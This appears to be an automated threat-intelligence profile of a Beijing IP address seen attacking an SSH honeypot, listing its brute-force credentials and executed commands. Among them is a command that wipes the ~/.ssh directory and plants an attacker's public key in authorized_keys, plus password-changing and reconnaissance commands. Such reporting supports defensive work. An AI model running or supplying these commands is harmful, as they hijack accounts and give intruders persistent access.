Active Threat โ€ข MEDIUM

120.48.122.102

First Detection12/29/2025
Last Activity2/22/2026
ISPBeijing Baidu Netcom Science and Technology Co., Ltd.
๐ŸŽฏ
100
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
14
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Beijing
ASN
AS38365
ISP
Beijing Baidu Netcom Science and Technology Co., Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”mana/mana
1x
๐Ÿ”mana/3245gs5662d34
1x
๐Ÿ”gamemaster/gamemaster
1x

Executed Commands

$Enter new UNIX password:2x
$whoami1x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~1x
$echo -e "mana\n3cLQAfROFcH8\n3cLQAfROFcH8"|passwd|bash1x
$lscpu | grep Model1x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'1x
$uname -a1x
$cat /proc/cpuinfo | grep name | wc -l1x
$echo "mana\n3cLQAfROFcH8\n3cLQAfROFcH8\n"|passwd1x
$crontab -l1x

Risk Assessment

55
/100
LowMediumHighCritical